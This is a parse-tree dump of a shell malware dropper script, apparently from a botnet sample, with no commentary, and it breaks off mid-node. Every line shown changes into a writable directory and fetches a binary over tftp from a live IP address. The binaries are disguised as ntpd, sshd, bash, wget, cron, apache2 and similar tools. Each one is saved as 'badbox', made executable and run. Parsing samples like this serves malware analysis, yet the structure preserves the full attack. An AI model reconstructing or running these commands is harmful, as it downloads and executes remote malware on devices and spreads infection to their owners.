CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 171), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 134), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 122), word='174.138.58.34'),
    WordNode(lineno=4, pos=(123, 125), word='-c'),
    WordNode(lineno=4, pos=(126, 129), word='get'),
    WordNode(lineno=4, pos=(130, 134), word='ntpd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(134, 135)),
  CommandNode(lineno=4, pos=(135, 151), parts=[
    WordNode(lineno=4, pos=(135, 138), word='cat'),
    WordNode(lineno=4, pos=(139, 143), word='ntpd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(145, 151), word='badbox'), pos=(144, 151), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(151, 152)),
  CommandNode(lineno=4, pos=(152, 162), parts=[
    WordNode(lineno=4, pos=(152, 157), word='chmod'),
    WordNode(lineno=4, pos=(158, 160), word='+x'),
    WordNode(lineno=4, pos=(161, 162), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(162, 163)),
  CommandNode(lineno=4, pos=(163, 171), parts=[
    WordNode(lineno=4, pos=(163, 171), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(172, 294), parts=[
  CommandNode(lineno=5, pos=(172, 179), parts=[
    WordNode(lineno=5, pos=(172, 174), word='cd'),
    WordNode(lineno=5, pos=(175, 179), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(180, 182)),
  CommandNode(lineno=5, pos=(183, 194), parts=[
    WordNode(lineno=5, pos=(183, 185), word='cd'),
    WordNode(lineno=5, pos=(186, 194), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(195, 197)),
  CommandNode(lineno=5, pos=(198, 205), parts=[
    WordNode(lineno=5, pos=(198, 200), word='cd'),
    WordNode(lineno=5, pos=(201, 205), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(206, 208)),
  CommandNode(lineno=5, pos=(209, 217), parts=[
    WordNode(lineno=5, pos=(209, 211), word='cd'),
    WordNode(lineno=5, pos=(212, 217), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(218, 220)),
  CommandNode(lineno=5, pos=(221, 225), parts=[
    WordNode(lineno=5, pos=(221, 223), word='cd'),
    WordNode(lineno=5, pos=(224, 225), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(225, 226)),
  CommandNode(lineno=5, pos=(227, 257), parts=[
    WordNode(lineno=5, pos=(227, 231), word='tftp'),
    WordNode(lineno=5, pos=(232, 245), word='174.138.58.34'),
    WordNode(lineno=5, pos=(246, 248), word='-c'),
    WordNode(lineno=5, pos=(249, 252), word='get'),
    WordNode(lineno=5, pos=(253, 257), word='sshd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(257, 258)),
  CommandNode(lineno=5, pos=(258, 274), parts=[
    WordNode(lineno=5, pos=(258, 261), word='cat'),
    WordNode(lineno=5, pos=(262, 266), word='sshd'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(268, 274), word='badbox'), pos=(267, 274), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(274, 275)),
  CommandNode(lineno=5, pos=(275, 285), parts=[
    WordNode(lineno=5, pos=(275, 280), word='chmod'),
    WordNode(lineno=5, pos=(281, 283), word='+x'),
    WordNode(lineno=5, pos=(284, 285), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(285, 286)),
  CommandNode(lineno=5, pos=(286, 294), parts=[
    WordNode(lineno=5, pos=(286, 294), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(295, 423), parts=[
  CommandNode(lineno=6, pos=(295, 302), parts=[
    WordNode(lineno=6, pos=(295, 297), word='cd'),
    WordNode(lineno=6, pos=(298, 302), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(303, 305)),
  CommandNode(lineno=6, pos=(306, 317), parts=[
    WordNode(lineno=6, pos=(306, 308), word='cd'),
    WordNode(lineno=6, pos=(309, 317), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(318, 320)),
  CommandNode(lineno=6, pos=(321, 328), parts=[
    WordNode(lineno=6, pos=(321, 323), word='cd'),
    WordNode(lineno=6, pos=(324, 328), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(329, 331)),
  CommandNode(lineno=6, pos=(332, 340), parts=[
    WordNode(lineno=6, pos=(332, 334), word='cd'),
    WordNode(lineno=6, pos=(335, 340), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(341, 343)),
  CommandNode(lineno=6, pos=(344, 348), parts=[
    WordNode(lineno=6, pos=(344, 346), word='cd'),
    WordNode(lineno=6, pos=(347, 348), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(348, 349)),
  CommandNode(lineno=6, pos=(350, 383), parts=[
    WordNode(lineno=6, pos=(350, 354), word='tftp'),
    WordNode(lineno=6, pos=(355, 368), word='174.138.58.34'),
    WordNode(lineno=6, pos=(369, 371), word='-c'),
    WordNode(lineno=6, pos=(372, 375), word='get'),
    WordNode(lineno=6, pos=(376, 383), word='openssh'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(383, 384)),
  CommandNode(lineno=6, pos=(384, 403), parts=[
    WordNode(lineno=6, pos=(384, 387), word='cat'),
    WordNode(lineno=6, pos=(388, 395), word='openssh'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(397, 403), word='badbox'), pos=(396, 403), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(403, 404)),
  CommandNode(lineno=6, pos=(404, 414), parts=[
    WordNode(lineno=6, pos=(404, 409), word='chmod'),
    WordNode(lineno=6, pos=(410, 412), word='+x'),
    WordNode(lineno=6, pos=(413, 414), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(414, 415)),
  CommandNode(lineno=6, pos=(415, 423), parts=[
    WordNode(lineno=6, pos=(415, 423), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(424, 546), parts=[
  CommandNode(lineno=7, pos=(424, 431), parts=[
    WordNode(lineno=7, pos=(424, 426), word='cd'),
    WordNode(lineno=7, pos=(427, 431), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(432, 434)),
  CommandNode(lineno=7, pos=(435, 446), parts=[
    WordNode(lineno=7, pos=(435, 437), word='cd'),
    WordNode(lineno=7, pos=(438, 446), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(447, 449)),
  CommandNode(lineno=7, pos=(450, 457), parts=[
    WordNode(lineno=7, pos=(450, 452), word='cd'),
    WordNode(lineno=7, pos=(453, 457), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(458, 460)),
  CommandNode(lineno=7, pos=(461, 469), parts=[
    WordNode(lineno=7, pos=(461, 463), word='cd'),
    WordNode(lineno=7, pos=(464, 469), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(470, 472)),
  CommandNode(lineno=7, pos=(473, 477), parts=[
    WordNode(lineno=7, pos=(473, 475), word='cd'),
    WordNode(lineno=7, pos=(476, 477), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(477, 478)),
  CommandNode(lineno=7, pos=(479, 509), parts=[
    WordNode(lineno=7, pos=(479, 483), word='tftp'),
    WordNode(lineno=7, pos=(484, 497), word='174.138.58.34'),
    WordNode(lineno=7, pos=(498, 500), word='-c'),
    WordNode(lineno=7, pos=(501, 504), word='get'),
    WordNode(lineno=7, pos=(505, 509), word='bash'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(509, 510)),
  CommandNode(lineno=7, pos=(510, 526), parts=[
    WordNode(lineno=7, pos=(510, 513), word='cat'),
    WordNode(lineno=7, pos=(514, 518), word='bash'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(520, 526), word='badbox'), pos=(519, 526), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(526, 527)),
  CommandNode(lineno=7, pos=(527, 537), parts=[
    WordNode(lineno=7, pos=(527, 532), word='chmod'),
    WordNode(lineno=7, pos=(533, 535), word='+x'),
    WordNode(lineno=7, pos=(536, 537), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(537, 538)),
  CommandNode(lineno=7, pos=(538, 546), parts=[
    WordNode(lineno=7, pos=(538, 546), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(547, 669), parts=[
  CommandNode(lineno=8, pos=(547, 554), parts=[
    WordNode(lineno=8, pos=(547, 549), word='cd'),
    WordNode(lineno=8, pos=(550, 554), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(555, 557)),
  CommandNode(lineno=8, pos=(558, 569), parts=[
    WordNode(lineno=8, pos=(558, 560), word='cd'),
    WordNode(lineno=8, pos=(561, 569), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(570, 572)),
  CommandNode(lineno=8, pos=(573, 580), parts=[
    WordNode(lineno=8, pos=(573, 575), word='cd'),
    WordNode(lineno=8, pos=(576, 580), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(581, 583)),
  CommandNode(lineno=8, pos=(584, 592), parts=[
    WordNode(lineno=8, pos=(584, 586), word='cd'),
    WordNode(lineno=8, pos=(587, 592), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(593, 595)),
  CommandNode(lineno=8, pos=(596, 600), parts=[
    WordNode(lineno=8, pos=(596, 598), word='cd'),
    WordNode(lineno=8, pos=(599, 600), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(600, 601)),
  CommandNode(lineno=8, pos=(602, 632), parts=[
    WordNode(lineno=8, pos=(602, 606), word='tftp'),
    WordNode(lineno=8, pos=(607, 620), word='174.138.58.34'),
    WordNode(lineno=8, pos=(621, 623), word='-c'),
    WordNode(lineno=8, pos=(624, 627), word='get'),
    WordNode(lineno=8, pos=(628, 632), word='tftp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(632, 633)),
  CommandNode(lineno=8, pos=(633, 649), parts=[
    WordNode(lineno=8, pos=(633, 636), word='cat'),
    WordNode(lineno=8, pos=(637, 641), word='tftp'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(643, 649), word='badbox'), pos=(642, 649), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(649, 650)),
  CommandNode(lineno=8, pos=(650, 660), parts=[
    WordNode(lineno=8, pos=(650, 655), word='chmod'),
    WordNode(lineno=8, pos=(656, 658), word='+x'),
    WordNode(lineno=8, pos=(659, 660), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(660, 661)),
  CommandNode(lineno=8, pos=(661, 669), parts=[
    WordNode(lineno=8, pos=(661, 669), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(670, 792), parts=[
  CommandNode(lineno=9, pos=(670, 677), parts=[
    WordNode(lineno=9, pos=(670, 672), word='cd'),
    WordNode(lineno=9, pos=(673, 677), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(678, 680)),
  CommandNode(lineno=9, pos=(681, 692), parts=[
    WordNode(lineno=9, pos=(681, 683), word='cd'),
    WordNode(lineno=9, pos=(684, 692), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(693, 695)),
  CommandNode(lineno=9, pos=(696, 703), parts=[
    WordNode(lineno=9, pos=(696, 698), word='cd'),
    WordNode(lineno=9, pos=(699, 703), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(704, 706)),
  CommandNode(lineno=9, pos=(707, 715), parts=[
    WordNode(lineno=9, pos=(707, 709), word='cd'),
    WordNode(lineno=9, pos=(710, 715), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(716, 718)),
  CommandNode(lineno=9, pos=(719, 723), parts=[
    WordNode(lineno=9, pos=(719, 721), word='cd'),
    WordNode(lineno=9, pos=(722, 723), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(723, 724)),
  CommandNode(lineno=9, pos=(725, 755), parts=[
    WordNode(lineno=9, pos=(725, 729), word='tftp'),
    WordNode(lineno=9, pos=(730, 743), word='174.138.58.34'),
    WordNode(lineno=9, pos=(744, 746), word='-c'),
    WordNode(lineno=9, pos=(747, 750), word='get'),
    WordNode(lineno=9, pos=(751, 755), word='wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(755, 756)),
  CommandNode(lineno=9, pos=(756, 772), parts=[
    WordNode(lineno=9, pos=(756, 759), word='cat'),
    WordNode(lineno=9, pos=(760, 764), word='wget'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(766, 772), word='badbox'), pos=(765, 772), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(772, 773)),
  CommandNode(lineno=9, pos=(773, 783), parts=[
    WordNode(lineno=9, pos=(773, 778), word='chmod'),
    WordNode(lineno=9, pos=(779, 781), word='+x'),
    WordNode(lineno=9, pos=(782, 783), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(783, 784)),
  CommandNode(lineno=9, pos=(784, 792), parts=[
    WordNode(lineno=9, pos=(784, 792), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(793, 915), parts=[
  CommandNode(lineno=10, pos=(793, 800), parts=[
    WordNode(lineno=10, pos=(793, 795), word='cd'),
    WordNode(lineno=10, pos=(796, 800), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(801, 803)),
  CommandNode(lineno=10, pos=(804, 815), parts=[
    WordNode(lineno=10, pos=(804, 806), word='cd'),
    WordNode(lineno=10, pos=(807, 815), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(816, 818)),
  CommandNode(lineno=10, pos=(819, 826), parts=[
    WordNode(lineno=10, pos=(819, 821), word='cd'),
    WordNode(lineno=10, pos=(822, 826), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(827, 829)),
  CommandNode(lineno=10, pos=(830, 838), parts=[
    WordNode(lineno=10, pos=(830, 832), word='cd'),
    WordNode(lineno=10, pos=(833, 838), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(839, 841)),
  CommandNode(lineno=10, pos=(842, 846), parts=[
    WordNode(lineno=10, pos=(842, 844), word='cd'),
    WordNode(lineno=10, pos=(845, 846), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(846, 847)),
  CommandNode(lineno=10, pos=(848, 878), parts=[
    WordNode(lineno=10, pos=(848, 852), word='tftp'),
    WordNode(lineno=10, pos=(853, 866), word='174.138.58.34'),
    WordNode(lineno=10, pos=(867, 869), word='-c'),
    WordNode(lineno=10, pos=(870, 873), word='get'),
    WordNode(lineno=10, pos=(874, 878), word='cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(878, 879)),
  CommandNode(lineno=10, pos=(879, 895), parts=[
    WordNode(lineno=10, pos=(879, 882), word='cat'),
    WordNode(lineno=10, pos=(883, 887), word='cron'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(889, 895), word='badbox'), pos=(888, 895), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(895, 896)),
  CommandNode(lineno=10, pos=(896, 906), parts=[
    WordNode(lineno=10, pos=(896, 901), word='chmod'),
    WordNode(lineno=10, pos=(902, 904), word='+x'),
    WordNode(lineno=10, pos=(905, 906), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(906, 907)),
  CommandNode(lineno=10, pos=(907, 915), parts=[
    WordNode(lineno=10, pos=(907, 915), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(916, 1036), parts=[
  CommandNode(lineno=11, pos=(916, 923), parts=[
    WordNode(lineno=11, pos=(916, 918), word='cd'),
    WordNode(lineno=11, pos=(919, 923), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(924, 926)),
  CommandNode(lineno=11, pos=(927, 938), parts=[
    WordNode(lineno=11, pos=(927, 929), word='cd'),
    WordNode(lineno=11, pos=(930, 938), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(939, 941)),
  CommandNode(lineno=11, pos=(942, 949), parts=[
    WordNode(lineno=11, pos=(942, 944), word='cd'),
    WordNode(lineno=11, pos=(945, 949), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(950, 952)),
  CommandNode(lineno=11, pos=(953, 961), parts=[
    WordNode(lineno=11, pos=(953, 955), word='cd'),
    WordNode(lineno=11, pos=(956, 961), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(962, 964)),
  CommandNode(lineno=11, pos=(965, 969), parts=[
    WordNode(lineno=11, pos=(965, 967), word='cd'),
    WordNode(lineno=11, pos=(968, 969), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(969, 970)),
  CommandNode(lineno=11, pos=(971, 1000), parts=[
    WordNode(lineno=11, pos=(971, 975), word='tftp'),
    WordNode(lineno=11, pos=(976, 989), word='174.138.58.34'),
    WordNode(lineno=11, pos=(990, 992), word='-c'),
    WordNode(lineno=11, pos=(993, 996), word='get'),
    WordNode(lineno=11, pos=(997, 1000), word='ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1000, 1001)),
  CommandNode(lineno=11, pos=(1001, 1016), parts=[
    WordNode(lineno=11, pos=(1001, 1004), word='cat'),
    WordNode(lineno=11, pos=(1005, 1008), word='ftp'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1010, 1016), word='badbox'), pos=(1009, 1016), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1016, 1017)),
  CommandNode(lineno=11, pos=(1017, 1027), parts=[
    WordNode(lineno=11, pos=(1017, 1022), word='chmod'),
    WordNode(lineno=11, pos=(1023, 1025), word='+x'),
    WordNode(lineno=11, pos=(1026, 1027), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1027, 1028)),
  CommandNode(lineno=11, pos=(1028, 1036), parts=[
    WordNode(lineno=11, pos=(1028, 1036), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1037, 1159), parts=[
  CommandNode(lineno=12, pos=(1037, 1044), parts=[
    WordNode(lineno=12, pos=(1037, 1039), word='cd'),
    WordNode(lineno=12, pos=(1040, 1044), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1045, 1047)),
  CommandNode(lineno=12, pos=(1048, 1059), parts=[
    WordNode(lineno=12, pos=(1048, 1050), word='cd'),
    WordNode(lineno=12, pos=(1051, 1059), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1060, 1062)),
  CommandNode(lineno=12, pos=(1063, 1070), parts=[
    WordNode(lineno=12, pos=(1063, 1065), word='cd'),
    WordNode(lineno=12, pos=(1066, 1070), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1071, 1073)),
  CommandNode(lineno=12, pos=(1074, 1082), parts=[
    WordNode(lineno=12, pos=(1074, 1076), word='cd'),
    WordNode(lineno=12, pos=(1077, 1082), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1083, 1085)),
  CommandNode(lineno=12, pos=(1086, 1090), parts=[
    WordNode(lineno=12, pos=(1086, 1088), word='cd'),
    WordNode(lineno=12, pos=(1089, 1090), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1090, 1091)),
  CommandNode(lineno=12, pos=(1092, 1122), parts=[
    WordNode(lineno=12, pos=(1092, 1096), word='tftp'),
    WordNode(lineno=12, pos=(1097, 1110), word='174.138.58.34'),
    WordNode(lineno=12, pos=(1111, 1113), word='-c'),
    WordNode(lineno=12, pos=(1114, 1117), word='get'),
    WordNode(lineno=12, pos=(1118, 1122), word='pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1122, 1123)),
  CommandNode(lineno=12, pos=(1123, 1139), parts=[
    WordNode(lineno=12, pos=(1123, 1126), word='cat'),
    WordNode(lineno=12, pos=(1127, 1131), word='pftp'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1133, 1139), word='badbox'), pos=(1132, 1139), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1139, 1140)),
  CommandNode(lineno=12, pos=(1140, 1150), parts=[
    WordNode(lineno=12, pos=(1140, 1145), word='chmod'),
    WordNode(lineno=12, pos=(1146, 1148), word='+x'),
    WordNode(lineno=12, pos=(1149, 1150), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1150, 1151)),
  CommandNode(lineno=12, pos=(1151, 1159), parts=[
    WordNode(lineno=12, pos=(1151, 1159), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1160, 1278), parts=[
  CommandNode(lineno=13, pos=(1160, 1167), parts=[
    WordNode(lineno=13, pos=(1160, 1162), word='cd'),
    WordNode(lineno=13, pos=(1163, 1167), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1168, 1170)),
  CommandNode(lineno=13, pos=(1171, 1182), parts=[
    WordNode(lineno=13, pos=(1171, 1173), word='cd'),
    WordNode(lineno=13, pos=(1174, 1182), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1183, 1185)),
  CommandNode(lineno=13, pos=(1186, 1193), parts=[
    WordNode(lineno=13, pos=(1186, 1188), word='cd'),
    WordNode(lineno=13, pos=(1189, 1193), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1194, 1196)),
  CommandNode(lineno=13, pos=(1197, 1205), parts=[
    WordNode(lineno=13, pos=(1197, 1199), word='cd'),
    WordNode(lineno=13, pos=(1200, 1205), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1206, 1208)),
  CommandNode(lineno=13, pos=(1209, 1213), parts=[
    WordNode(lineno=13, pos=(1209, 1211), word='cd'),
    WordNode(lineno=13, pos=(1212, 1213), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1213, 1214)),
  CommandNode(lineno=13, pos=(1215, 1243), parts=[
    WordNode(lineno=13, pos=(1215, 1219), word='tftp'),
    WordNode(lineno=13, pos=(1220, 1233), word='174.138.58.34'),
    WordNode(lineno=13, pos=(1234, 1236), word='-c'),
    WordNode(lineno=13, pos=(1237, 1240), word='get'),
    WordNode(lineno=13, pos=(1241, 1243), word='sh'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1243, 1244)),
  CommandNode(lineno=13, pos=(1244, 1258), parts=[
    WordNode(lineno=13, pos=(1244, 1247), word='cat'),
    WordNode(lineno=13, pos=(1248, 1250), word='sh'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1252, 1258), word='badbox'), pos=(1251, 1258), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1258, 1259)),
  CommandNode(lineno=13, pos=(1259, 1269), parts=[
    WordNode(lineno=13, pos=(1259, 1264), word='chmod'),
    WordNode(lineno=13, pos=(1265, 1267), word='+x'),
    WordNode(lineno=13, pos=(1268, 1269), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1269, 1270)),
  CommandNode(lineno=13, pos=(1270, 1278), parts=[
    WordNode(lineno=13, pos=(1270, 1278), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1279, 1403), parts=[
  CommandNode(lineno=14, pos=(1279, 1286), parts=[
    WordNode(lineno=14, pos=(1279, 1281), word='cd'),
    WordNode(lineno=14, pos=(1282, 1286), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1287, 1289)),
  CommandNode(lineno=14, pos=(1290, 1301), parts=[
    WordNode(lineno=14, pos=(1290, 1292), word='cd'),
    WordNode(lineno=14, pos=(1293, 1301), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1302, 1304)),
  CommandNode(lineno=14, pos=(1305, 1312), parts=[
    WordNode(lineno=14, pos=(1305, 1307), word='cd'),
    WordNode(lineno=14, pos=(1308, 1312), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1313, 1315)),
  CommandNode(lineno=14, pos=(1316, 1324), parts=[
    WordNode(lineno=14, pos=(1316, 1318), word='cd'),
    WordNode(lineno=14, pos=(1319, 1324), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1325, 1327)),
  CommandNode(lineno=14, pos=(1328, 1332), parts=[
    WordNode(lineno=14, pos=(1328, 1330), word='cd'),
    WordNode(lineno=14, pos=(1331, 1332), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1332, 1333)),
  CommandNode(lineno=14, pos=(1334, 1365), parts=[
    WordNode(lineno=14, pos=(1334, 1338), word='tftp'),
    WordNode(lineno=14, pos=(1339, 1352), word='174.138.58.34'),
    WordNode(lineno=14, pos=(1353, 1355), word='-c'),
    WordNode(lineno=14, pos=(1356, 1359), word='get'),
    WordNode(lineno=14, pos=(1360, 1365), word='[cpu]'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1365, 1366)),
  CommandNode(lineno=14, pos=(1366, 1383), parts=[
    WordNode(lineno=14, pos=(1366, 1369), word='cat'),
    WordNode(lineno=14, pos=(1370, 1375), word='[cpu]'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1377, 1383), word='badbox'), pos=(1376, 1383), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1383, 1384)),
  CommandNode(lineno=14, pos=(1384, 1394), parts=[
    WordNode(lineno=14, pos=(1384, 1389), word='chmod'),
    WordNode(lineno=14, pos=(1390, 1392), word='+x'),
    WordNode(lineno=14, pos=(1393, 1394), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1394, 1395)),
  CommandNode(lineno=14, pos=(1395, 1403), parts=[
    WordNode(lineno=14, pos=(1395, 1403), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1404, 1532), parts=[
  CommandNode(lineno=15, pos=(1404, 1411), parts=[
    WordNode(lineno=15, pos=(1404, 1406), word='cd'),
    WordNode(lineno=15, pos=(1407, 1411), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1412, 1414)),
  CommandNode(lineno=15, pos=(1415, 1426), parts=[
    WordNode(lineno=15, pos=(1415, 1417), word='cd'),
    WordNode(lineno=15, pos=(1418, 1426), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1427, 1429)),
  CommandNode(lineno=15, pos=(1430, 1437), parts=[
    WordNode(lineno=15, pos=(1430, 1432), word='cd'),
    WordNode(lineno=15, pos=(1433, 1437), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1438, 1440)),
  CommandNode(lineno=15, pos=(1441, 1449), parts=[
    WordNode(lineno=15, pos=(1441, 1443), word='cd'),
    WordNode(lineno=15, pos=(1444, 1449), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1450, 1452)),
  CommandNode(lineno=15, pos=(1453, 1457), parts=[
    WordNode(lineno=15, pos=(1453, 1455), word='cd'),
    WordNode(lineno=15, pos=(1456, 1457), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1457, 1458)),
  CommandNode(lineno=15, pos=(1459, 1492), parts=[
    WordNode(lineno=15, pos=(1459, 1463), word='tftp'),
    WordNode(lineno=15, pos=(1464, 1477), word='174.138.58.34'),
    WordNode(lineno=15, pos=(1478, 1480), word='-c'),
    WordNode(lineno=15, pos=(1481, 1484), word='get'),
    WordNode(lineno=15, pos=(1485, 1492), word='apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1492, 1493)),
  CommandNode(lineno=15, pos=(1493, 1512), parts=[
    WordNode(lineno=15, pos=(1493, 1496), word='cat'),
    WordNode(lineno=15, pos=(1497, 1504), word='apache2'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1506, 1512), word='badbox'), pos=(1505, 1512), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1512, 1513)),
  CommandNode(lineno=15, pos=(1513, 1523), parts=[
    WordNode(lineno=15, pos=(1513, 1518), word='chmod'),
    WordNode(lineno=15, pos=(1519, 1521), word='+x'),
    WordNode(lineno=15, pos=(1522, 1523), word='*'),
  ]),
